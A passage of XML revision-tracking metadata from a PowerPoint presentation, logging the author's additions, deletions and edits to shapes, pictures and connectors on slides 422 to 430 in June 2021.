            <ac:spMk id="4" creationId="{865FC440-8473-46C8-946A-1A11FC0B1429}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2079099636" sldId="422"/>
            <ac:spMk id="5" creationId="{E8A1E363-F51C-4F5E-A51D-2389A851E432}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2079099636" sldId="422"/>
            <ac:spMk id="6" creationId="{449AE0BE-8BC1-40D0-BE3C-863E835D7821}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2079099636" sldId="422"/>
            <ac:spMk id="7" creationId="{9D34631C-3648-4EA4-880B-11313FE9AE78}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2079099636" sldId="422"/>
            <ac:spMk id="8" creationId="{9D3C5E17-5565-4B97-9B45-316ABB33CC8E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:53:02.859" v="822" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2079099636" sldId="422"/>
            <ac:picMk id="3" creationId="{BCE90B32-AF5E-4312-B8FD-6853534DA96C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1881823739" sldId="423"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:spMk id="2" creationId="{4DFC9DA3-4DF5-4CDD-A4D5-ABF5F3B6A19C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-25T23:56:55.118" v="856" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:spMk id="3" creationId="{5BCC6428-4BB8-4624-A8AC-5085CC0DE3B8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:spMk id="4" creationId="{7EC43AF6-F0B0-4107-AC60-772832F00A1F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:26.343" v="1037" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:spMk id="9" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:spMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:spMk id="13" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:29.785" v="1038" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:spMk id="18" creationId="{1BFE218D-FB3A-4368-96C3-B96769DF124E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:spMk id="19" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:50.487" v="915" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:picMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:06.198" v="1032" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:picMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:picMk id="8" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:picMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:picMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:cxnChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:38:52.255" v="916" actId="478"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:cxnSpMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:cxnSpMk id="15" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:14.836" v="1034" actId="1076"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:cxnSpMk id="17" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:40:21.094" v="1036" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1881823739" sldId="423"/>
            <ac:cxnSpMk id="21" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new del mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:55:30.187" v="1172" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1470109627" sldId="424"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T00:47:50.499" v="1153"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1470109627" sldId="424"/>
            <ac:spMk id="2" creationId="{B0DB52BB-0D1F-4CD4-B402-02E727E4AAA3}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3519466523" sldId="424"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3519466523" sldId="424"/>
            <ac:spMk id="2" creationId="{1E28D788-EB65-442E-BF8E-6E21E71F477D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3519466523" sldId="424"/>
            <ac:spMk id="3" creationId="{B8989B4C-0DBB-4A73-B84F-191C4CC27DB8}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3519466523" sldId="424"/>
            <ac:spMk id="5" creationId="{14BB801E-0FF6-43E1-A10B-194BA3481A6B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T01:05:19.123" v="1190" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3519466523" sldId="424"/>
            <ac:picMk id="4" creationId="{3AF00A42-DD89-471A-8241-2180DBBAB4C4}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2940456927" sldId="425"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2940456927" sldId="425"/>
            <ac:spMk id="2" creationId="{06677C6F-6A17-41B9-9454-20C2E6C55EA6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2940456927" sldId="425"/>
            <ac:spMk id="3" creationId="{D17A6442-D3BC-4F64-9331-475A35BB4A8D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2940456927" sldId="425"/>
            <ac:spMk id="5" creationId="{1684FDA3-5034-4A7C-B76D-BB309E523042}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T01:09:04.436" v="1257" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2940456927" sldId="425"/>
            <ac:picMk id="4" creationId="{A5593BA6-07CA-403C-86E6-BDE18378DE28}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3876190788" sldId="426"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876190788" sldId="426"/>
            <ac:spMk id="2" creationId="{EB4E78CA-DE93-49BF-9D11-4EA9A654062C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876190788" sldId="426"/>
            <ac:spMk id="3" creationId="{13D8ED4D-E9C0-44E0-AB71-F20C64EF6C17}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876190788" sldId="426"/>
            <ac:spMk id="5" creationId="{BBB533FB-1947-490F-87C2-AD866096C002}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T01:11:01.298" v="1287" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3876190788" sldId="426"/>
            <ac:picMk id="4" creationId="{3A107650-4446-4602-9FDD-75C01AC6A063}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod ord chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:12:15.231" v="1756"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2709397411" sldId="427"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T01:10:02.849" v="1754" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2709397411" sldId="427"/>
            <ac:spMk id="2" creationId="{92013E93-DB90-492A-B250-3D654DE4F4A2}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2709397411" sldId="427"/>
            <ac:spMk id="3" creationId="{5A9CBC47-5281-42C1-A152-5F706863C0E1}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2709397411" sldId="427"/>
            <ac:spMk id="5" creationId="{769141F6-EC35-4CD8-978C-D4EDCDBBDBE0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T01:23:04.133" v="1351" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2709397411" sldId="427"/>
            <ac:picMk id="4" creationId="{BE4CED26-C59D-47B3-9EA1-983AA7F15614}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T01:23:06.499" v="1352" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2709397411" sldId="427"/>
            <ac:picMk id="6" creationId="{E95EF2DC-8971-4687-9975-100E993AE56C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="647302650" sldId="428"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="647302650" sldId="428"/>
            <ac:spMk id="2" creationId="{4F401151-1B5F-4DB3-A0F6-58B96ACD3D4F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="647302650" sldId="428"/>
            <ac:spMk id="3" creationId="{827EFDD1-A4EC-4153-BCBF-629B5495FFD6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="647302650" sldId="428"/>
            <ac:spMk id="5" creationId="{E2DD6ECE-65E8-41A3-AF57-49DFAF9BF3CF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T12:26:54.201" v="1371" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="647302650" sldId="428"/>
            <ac:picMk id="4" creationId="{64514D24-E2E1-4CA1-B9D1-9A443420AD45}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="878272104" sldId="429"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="878272104" sldId="429"/>
            <ac:spMk id="2" creationId="{AAEA0374-E6C7-4341-839D-8B02B7028CCD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="878272104" sldId="429"/>
            <ac:spMk id="3" creationId="{AF8606E7-8F32-4DFE-8870-EE208E0465D7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="878272104" sldId="429"/>
            <ac:spMk id="5" creationId="{57A321DF-9E2B-481A-A02B-FCB9BCCAC1DF}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T12:30:41.039" v="1379" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="878272104" sldId="429"/>
            <ac:picMk id="4" creationId="{726E208B-FDF0-4619-8C04-9F2AEF8CBE06}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modClrScheme chgLayout">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:54:00.122" v="1673" actId="6264"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4091828154" sldId="430"/>
        </pc:sldMkLst>
        <pc:spChg chg="del mod ord">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-26T12:32:34.009" v="1381" actId="700"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4091828154" sldId="430"/>
            <ac:spMk id="2" creationId="{64A2FC9C-D79A-4E84-81B9-7BDFBFAD51E6}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{2DF50834-70B7-4792-8287-7E44FACC55EB}" dt="2021-06-27T00:53:59.906" v="1672" actId="6264"/>
          <ac:spMkLst>
            <pc:docMk/>
